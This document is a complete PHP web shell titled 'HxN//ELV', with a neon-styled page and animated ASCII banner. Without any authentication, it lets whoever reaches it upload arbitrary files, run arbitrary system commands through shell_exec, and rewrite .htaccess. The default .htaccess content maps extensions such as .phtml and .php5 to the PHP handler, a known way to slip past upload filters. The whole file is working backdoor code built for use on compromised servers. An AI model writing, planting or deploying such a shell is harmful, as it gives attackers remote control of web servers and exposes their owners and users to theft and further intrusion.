<?php
$s=$m=$o="";
if($_SERVER['REQUEST_METHOD']=='POST'){
    if(isset($_FILES['f'])) $s=move_uploaded_file($_FILES['f']['tmp_name'],getcwd().'/'.basename($_FILES['f']['name']))?"<div style=color:#0f0>[OK] UPLOADED</div>":"<div style=color:#f00>[FAIL] UPLOAD</div>";
    if(isset($_POST['htc'])) $m=file_put_contents('.htaccess',$_POST['htc'])?"<div style=color:#0f0>[OK] .HTACCESS SAVED</div>":"<div style=color:#f00>[FAIL] .HTACCESS</div>";
    if(isset($_POST['cmd'])) $o=htmlentities(shell_exec($_POST['cmd'].' 2>&1'),ENT_QUOTES,'UTF-8');
}
$h=file_exists('.htaccess')?htmlentities(file_get_contents('.htaccess'),ENT_QUOTES,'UTF-8'):'AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .php7 .php8';
?>
<!DOCTYPE html><html><head><meta charset=UTF-8><title>HxN//ELV</title><style>*{margin:0;padding:0;box-sizing:border-box}body{background:#05010a;color:#00f3ff;font-family:monospace;display:flex;justify-content:center;align-items:center;min-height:100vh;padding:10px}.c{background:rgba(10,2,20,.92);border:1px solid #bd00ff;padding:20px;text-align:center;width:600px;box-shadow:0 0 20px rgba(189,0,255,.15)}#a{font-size:8px;line-height:1.1;margin:0 auto 10px;font-weight:700;color:#fff;display:inline-block;text-align:left;white-space:pre;letter-spacing:2px;text-shadow:2px 0 #00f3ff,-2px 0 #bd00ff}.u{border:1px dashed #bd00ff;padding:10px;margin-bottom:8px;background:rgba(189,0,255,.03)}input,textarea{background:#0a0214;border:1px solid #00f3ff;color:#00f3ff;padding:5px 8px;font-family:monospace;width:100%;outline:none;font-size:11px}textarea{height:80px;resize:vertical}.b{background:0 0;border:2px solid #00f3ff;color:#00f3ff;padding:6px 20px;cursor:pointer;font-weight:700;font-family:monospace;letter-spacing:2px;font-size:12px;margin-top:5px}.b:hover{background:#00f3ff;color:#05010a}.s{border-top:1px solid #bd00ff;margin:12px 0 10px;padding-top:10px;font-size:11px;color:#bd00ff;letter-spacing:1px}</style></head><body><div class=c><pre id=a></pre><script>const h=["██╗░░██╗██╗░░██╗███╗░░██╗","██║░░██║╚██╗██╔╝████╗░██║","███████║░╚███╔╝░██╔██╗██║","██╔══██║░██╔██╗░██║╚████║","██║░░██║██╔╝╚██╗██║░╚███║","╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝"].join("\n"),e=["███████╗██╗░░░░██╗░░░██╗","██╔════╝██║░░░░██║░░░██║","█████╗░░██║░░░░╚██╗░██╔╝","██╔══╝░░██║░░░░░╚████╔╝░","███████╗███████╗░╚██╔╝░░","╚══════╝╚══════╝░░╚═╝░░░"].join("\n");let l=document.getElementById('a'),c='h';l.textContent=h;setInterval(()=>{l.textContent=c==='h'?e:h;c=c==='h'?'e':'h'},1800);setInterval(()=>{l.style.textShadow=Math.random()>.5?'2px 0 #00f3ff,-2px 0 #bd00ff':'3px 0 #00f3ff,-1px 0 #bd00ff';l.style.transform='skew('+((Math.random()-.5)*2)+'deg)'},150);</script><?php echo $s.$m; ?><form method=POST enctype=multipart/form-data><div class=u><input type=file name=f required></div><button class=b>UPLOAD</button></form><div class=s>⚡ INTERACTIVE CMD ⚡</div><form method=POST><input type=text name=cmd placeholder="Command..." required style=margin-bottom:6px><button class=b>EXECUTE</button></form><?php if($o!==""):?><textarea readonly style=margin-top:6px><?php echo $o; ?></textarea><?php endif;?><div class=s>⚡ .HTACCESS MAKER ⚡</div><form method=POST><textarea name=htc><?php echo $h; ?></textarea><button class=b style=margin-top:6px>SAVE</button></form></div></body></html>
